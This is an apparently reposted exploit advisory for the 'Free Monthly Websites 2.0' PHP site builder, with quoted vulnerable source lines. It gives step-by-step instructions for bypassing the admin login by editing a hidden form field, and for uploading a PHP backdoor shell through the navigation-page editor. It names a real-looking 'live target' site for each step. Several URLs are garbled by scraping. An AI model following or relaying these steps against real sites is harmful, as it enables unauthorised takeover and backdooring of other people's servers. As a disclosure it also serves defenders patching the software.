标题:Free Monthly Websites 2.0 Multiple Vulnerabilities 作者 : X-Cisadane 开发者 : http://HdhCmsTestfreemonthlywebsites2测试数据/ 下载 地址: http://HdhCmsTestfreemonthlywebsites2测试数据/downloads/fmw_oto/websites/Free_Monthly_Websites_50_Custom_Websites_MPW7199.zip 影响版本 : 2.0 缺陷: Admin Login Bypass and Shell Upload Vulnerability 测试平台 : Google Chrome 24.0.1312.52 m (Windows XP SP 3 32-Bit English) 测试证明 ================ [ 1 ] Admin Login Bypass Vulnerable page http://HdhCmsTest2cto测试数据 /[path]/admin/index.php Line 40 <form name="frm" action="file_io.php" method="post" onSubmit="return chk()"> 41 <input type="hidden" name="do_type" value="admin_settings_read"> Vulnerable page http://target测试数据/[path]/admin/login.php Line 40 <form name="frm" action="file_io.php" method="post" onSubmit="return chk()"> 41 <input type="hidden" name="do_type" value="admin_settings_read"> Vulnerable page http://target测试数据/[path]/admin/file_io.php Line 14 if($_REQUEST[do_type]=="admin_settings_read") 15 { 16 $filename="settings/admin_settings.txt"; 17 18 if(!$handle = fopen($filename, 'r')) 19 { 20 echo "Cannot open file ($filename)"; 21 exit; 22 } 23 $contents = fread($handle, filesize($filename)); 24 fclose($handle); 25 $argument_arr=explode("#_1_#",$contents); 26 27 if($argument_arr[0]==$_REQUEST[username] && $argument_arr[1]==$_REQUEST[pass]) 28 { 29 $_SESSION[logged_in]=true; 30 header("location:welcome.php"); Based at line 16 we know that Admin Username and Password store in admin_settings.txt NOT on Database! So When we login into Admin Panel, file_io.php will Read Valid Username and Password from admin_settings.txt If you do a direct access to the file admin_settings.txt, The results is 403 Permission Denied You do not have permission for this request /admin/settings/admin_settings.txt Pic : http://i48.tinypic测试数据/2gvlwt4.png So... How to Bypass Admin Login Page? 1st. Open the Admin Login Page : http://target测试数据/[path]/admin/index.php Live Target : http://HdhCmsTestmassmoneywebsites测试数据/admin/ 2nd. Inspect Element on the login Form. Pic : http://i47.tinypic测试数据/2r5ddp1.png 3rd. Change from <form name="frm" action="file_io.php" method="post" onsubmit="return chk()"></form> <input type="hidden" name="do_type" value="admin_settings_read"> CHANGE TO <form name="frm" action="file_io.php" method="post" onsubmit="return chk()"></form> <input type="text" name="do_type" value="admin_settings_write"> Then press ENTER (please see pic). Pic : http://i49.tinypic测试数据/351z3ib.png 4th. You will see A Login Failed Page : >> You need to login in to access that page << Pic : http://i50.tinypic测试数据/33ws8jb.png Never Mind About that, just click 'Login Button' and VOILA you get and Admin Access! pic : http://i45.tinypic测试数据/jzwpea.png ---------------------------------------- [ 2 ] Upload PHP Backdoor or PHP Shell This vulnerability works on PREMIUM VERSION of Free Monthly Websites 2.0 So... How to Upload Backdoor (PHP Shell)? 1st. Go to Add/Remove Navigation Page. http://target测试数据/[path]/admin/add_main_pages.php Live Target : http://HdhCmsTestmassmoneywebsites测试数据/admin/add_main_pages.php 2nd. Enter a Name For Your New Navigation Page That You Wish To Add: dwi.php And click Add New Navigation Page. Pic : http://i45.tinypic测试数据/vigzsp.png 3rd. Still at the same page, scroll down the page until you see this section : Sort Your Page Buttons/Links. Pic : http://i46.tinypic测试数据/1040oxg.png Change FROM dwi.php. html TO /dwi.php then Click Sort Navigation Pages. Pic : http://i49.tinypic测试数据/24ec1l0.jpg 4th. Go to Edit Navigation Page. http://HdhCmsTestmassmoneywebsites测试数据/admin/edit_main_pages.php Please Select a Page To Edit: dwi.php.html <--- Select that page. 5th. Inspect element on dwi.php.html Pic : http://i50.tinypic测试数据/29pq1ix.png Change FROM <option value="dwi.php.html" selected="">dwi.php.html</option> To <option value="dwi.php" selected="">dwi.php</option> Pic : http://i47.tinypic测试数据/wtb0j6.png 6th. Enter A Page Title As You Would Like It To Be Seen. Fill with dwi.php URL For This Page: main_pages/dwi.php Use the 'URL For This Page' field above: [Tick] Display This Page in Left Vertical Site Navigation: [Tick] Display This Page in Top Horizontal Site Navigation Buttons: [Tick] Pic : http://i46.tinypic测试数据/1zebnle.png 7th. Still at the same page, scroll down the page until you see this section : Enter Content For Your Page: Click SOURCE button Press Enter Twice at the First Line then Paste your PHP Backdoor/PHP Shell below. And Press Enter Twice at the Last Line. *Please see 2 Pictures below If you dunno Understand :p Pic 1 : http://i49.tinypic测试数据/1zlzxq0.png Pic 2 : http://i48.tinypic测试数据/291kc9h.png If you wanna do this, please Remove Your Backdoor Password. Click Save Edited Navigation Page. 8th. After this message >> Data saved successfully << Appeared, Visit the Home Page and you will see the Backdoor Page Pic : http://i49.tinypic测试数据/4rt1g4.png //I'm sorry My English was poor
查看更多关于Free Monthly Websites 2.0多重缺陷及修复 - 网站安全的详细内容...